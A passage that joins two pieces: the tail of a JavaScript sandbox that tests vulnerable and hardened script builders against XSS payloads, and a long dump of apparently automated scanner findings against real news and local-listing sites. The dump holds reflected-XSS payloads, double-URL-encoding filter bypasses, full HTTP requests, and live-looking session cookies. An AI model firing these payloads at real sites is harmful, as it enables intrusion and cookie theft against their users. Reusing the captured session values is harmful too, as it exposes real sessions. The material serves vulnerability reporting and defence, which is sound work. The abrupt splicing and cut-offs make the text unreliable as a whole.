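    .replace(/>/g, "&gt;");
}

// Sink 1: var pid = "..."; raw concatenation vs. encoded literal.
function vulnerablePidScript(pid) {
  return 'var pid = "' + pid + '";';
}
function hardenedPidScript(pid) {
  return "var pid = " + jsStringLiteral(pid) + ";";
}

// Sink 2: user data inside a commented-out line. A raw newline ends the
// // comment, so whatever follows it executes. host.invalid is a placeholder.
function vulnerableCommentScript(pid) {
  return "//jQuery('#copy_url').val(\"http://host.invalid/video/?pid=" + pid + "\")";
}
function hardenedCommentScript(pid) {
  return "//jQuery('#copy_url').val(" + jsStringLiteral("http://host.invalid/video/?pid=" + pid) + ")";
}

// Sink 3: <meta property="og:url" content="..."/>
function ogUrlMeta(url) {
  return '<meta property="og:url" content="' + htmlAttribute(url) + '"/>';
}

// Executes a generated script with a stand-in alert() and reports whether it
// fired and what value, if any, ended up in `pid`.
function runScript(script) {
  let alerted = 0;
  const fakeAlert = () => { alerted += 1; };
  try {
    const pid = new Function(
      "alert",
      script + "\nreturn typeof pid === 'undefined' ? undefined : pid;"
    )(fakeAlert);
    return { alerted, pid, error: null };
  } catch (e) {
    return { alerted, pid: undefined, error: e.name };
  }
}

// Payloads taken from the report, in decoded form.
const PAYLOAD_STRING_ARITH = '4c0f6"-alert(1)-"e4eac61e9e2';
const PAYLOAD_STRING_STMT = '141fb";alert(1)//565b10a0203';
const PAYLOAD_COMMENT_NEWLINE = "adbfe\nalert(1)//96ecf22eb82";
const PAYLOAD_ATTRIBUTE = '8bd84"><script>alert(1)</script>0353f801000';

console.log("vulnerable string:", runScript(vulnerablePidScript(PAYLOAD_STRING_ARITH)));
console.log("hardened string:  ", runScript(hardenedPidScript(PAYLOAD_STRING_ARITH)));
console.log("vulnerable comment:", runScript(vulnerableCommentScript(PAYLOAD_COMMENT_NEWLINE)));
console.log("hardened comment:  ", runScript(hardenedCommentScript(PAYLOAD_COMMENT_NEWLINE)));
console.log("attribute:", ogUrlMeta(PAYLOAD_ATTRIBUTE));
```

The sandbox only models the JavaScript parser, so the `</script>` breakout (an HTML-parser effect) shows up here as a syntax error in the vulnerable version rather than as a fired alert; the hardened literal avoids it by never emitting a raw `<` into the script at all. The cleanest fix for the commented-out line is to delete it, since dead code that still carries user input is an attack surface with no benefit.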
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 952f5%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9092bca5106 was submitted in the REST URL parameter 1. This input was echoed as 952f5</script><script>alert(1)</script>9092bca5106 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /_uac952f5%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9092bca5106/adpage.html HTTP/1.1
Host: www.citysbest.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/mapquestaa8d4%253c%252fscript%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253efe33dffe06e/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b3af"><script>alert(1)</script>d5ec3faf17f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /_uac2b3af"><script>alert(1)</script>d5ec3faf17f/adpage.html HTTP/1.1
Host: www.citysbest.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/mapquestaa8d4%253c%252fscript%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253efe33dffe06e/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa8d4%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efe33dffe06e was submitted in the REST URL parameter 1. This input was echoed as aa8d4</script><script>alert(1)</script>fe33dffe06e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /mapquestaa8d4%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efe33dffe06e/ HTTP/1.1
Host: www.citysbest.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1861c"><script>alert(1)</script>acbaae0e7bd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mapquest1861c"><script>alert(1)</script>acbaae0e7bd/ HTTP/1.1
Host: www.citysbest.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ababd%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec96ef10a8fd was submitted in the REST URL parameter 1. This input was echoed as ababd</script><script>alert(1)</script>c96ef10a8fd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /trafficababd%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec96ef10a8fd/?t=js&bv=&os=&tz=&lg=&rv=&rsv=&pw=%2Fmapquestaa8d4%25253c%25252fscript%25253e%25253cscript%25253ealert%252528document.cookie%252529%25253c%25252fscript%25253efe33dffe06e%2F&cb=271675454 HTTP/1.1
Host: www.citysbest.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/mapquestaa8d4%253c%252fscript%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253efe33dffe06e/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20912"><script>alert(1)</script>b3408fe20ce was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /traffic20912"><script>alert(1)</script>b3408fe20ce/?t=js&bv=&os=&tz=&lg=&rv=&rsv=&pw=%2Fmapquestaa8d4%25253c%25252fscript%25253e%25253cscript%25253ealert%252528document.cookie%252529%25253c%25252fscript%25253efe33dffe06e%2F&cb=271675454 HTTP/1.1
Host: www.citysbest.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/mapquestaa8d4%253c%252fscript%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253efe33dffe06e/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 849fb%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8ed29de1c6c was submitted in the REST URL parameter 1. This input was echoed as 849fb</script><script>alert(1)</script>8ed29de1c6c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /traffic849fb%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8ed29de1c6c/status.gif?ver=1297024389 HTTP/1.1
Host: www.citysbest.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/mapquestaa8d4%253c%252fscript%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253efe33dffe06e/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45872"><script>alert(1)</script>628458da9d0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /traffic45872"><script>alert(1)</script>628458da9d0/status.gif?ver=1297024389 HTTP/1.1
Host: www.citysbest.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/mapquestaa8d4%253c%252fscript%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253efe33dffe06e/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e172"><script>alert(1)</script>d0a96e7b6bc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /traffic/status.gif5e172"><script>alert(1)</script>d0a96e7b6bc?ver=1297024389 HTTP/1.1
Host: www.citysbest.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/mapquestaa8d4%253c%252fscript%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253efe33dffe06e/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7d1b%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebe765f18667 was submitted in the REST URL parameter 2. This input was echoed as f7d1b</script><script>alert(1)</script>be765f18667 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /traffic/status.giff7d1b%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebe765f18667?ver=1297024389 HTTP/1.1
Host: www.citysbest.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/mapquestaa8d4%253c%252fscript%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253efe33dffe06e/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the 3054c%22-alert(document.cookie)-%22c83105876b0 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2bad5"-alert(1)-"1844aeff19e was submitted in the 3054c%22-alert(document.cookie)-%22c83105876b0 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?3054c%22-alert(document.cookie)-%22c83105876b0=12bad5"-alert(1)-"1844aeff19e HTTP/1.1
Host: www.dailyfinance.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/?3054c%22-alert(document.cookie)-%22c83105876b0=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; AOL_StockQuotesLiveUpdate=1; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; df_mon_dom=true; JSESSIONID=24A9B247E5951D815B25A6B748449EA7
Response
HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:34:58 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Set-Cookie: JSESSIONID=D5AE613AA8E55EFF8F0281D0AF53DB94; Path=/
Content-Length: 141576
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... nce.com";
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ' ...[SNIP]...
1.300. http://www.dailyfinance.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.dailyfinance.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3054c"-alert(1)-"c83105876b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?3054c"-alert(1)-"c83105876b0=1 HTTP/1.1
Host: www.dailyfinance.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 19:47:07 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Set-Cookie: JSESSIONID=47843EA14399D06A26E7833C4CA1046C; Path=/
Content-Length: 141563
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... s_265.linkInternalFilters="javascript:,dailyfinance.com";
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
1.301. http://www.dailyfinance.com/about/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.dailyfinance.com
Path: /about/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b569e"-alert(1)-"0c849816d68 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /about/?b569e"-alert(1)-"0c849816d68=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
1.302. http://www.dailyfinance.com/article/mga-files-antitrust-case-against-mattel/1178866/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e702"-alert(1)-"7b7ae57bd3c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /article/mga-files-antitrust-case-against-mattel/1178866/?3e702"-alert(1)-"7b7ae57bd3c=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/java ...[SNIP]...
1.303. http://www.dailyfinance.com/article/mga-files-antitrust-case-against-mattel/1178866/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7625c"><script>alert(1)</script>1046fb9ec66 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /article/mga-files-antitrust-case-against-mattel/1178866/?7625c"><script>alert(1)</script>1046fb9ec66=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da218"><img%20src%3da%20onerror%3dalert(1)>5fdda549cb4 was submitted in the REST URL parameter 2. This input was echoed as da218"><img src=a onerror=alert(1)>5fdda549cb4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /category/careersda218"><img%20src%3da%20onerror%3dalert(1)>5fdda549cb4/ HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe2a1%2522%253bead921a9154 was submitted in the REST URL parameter 2. This input was echoed as fe2a1";ead921a9154 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /category/careersfe2a1%2522%253bead921a9154/ HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
1.306. http://www.dailyfinance.com/category/careers/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.dailyfinance.com
Path: /category/careers/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18edc"-alert(1)-"0161a350c66 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /category/careers/?18edc"-alert(1)-"0161a350c66=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2fd0"><img%20src%3da%20onerror%3dalert(1)>81965e4e939 was submitted in the REST URL parameter 2. This input was echoed as a2fd0"><img src=a onerror=alert(1)>81965e4e939 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /category/college-financea2fd0"><img%20src%3da%20onerror%3dalert(1)>81965e4e939/ HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d87a8%2522%253bef859e81cd9 was submitted in the REST URL parameter 2. This input was echoed as d87a8";ef859e81cd9 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /category/college-financed87a8%2522%253bef859e81cd9/ HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
1.309. http://www.dailyfinance.com/category/college-finance/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.dailyfinance.com
Path: /category/college-finance/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 37db9"-alert(1)-"9321b376c63 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /category/college-finance/?37db9"-alert(1)-"9321b376c63=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
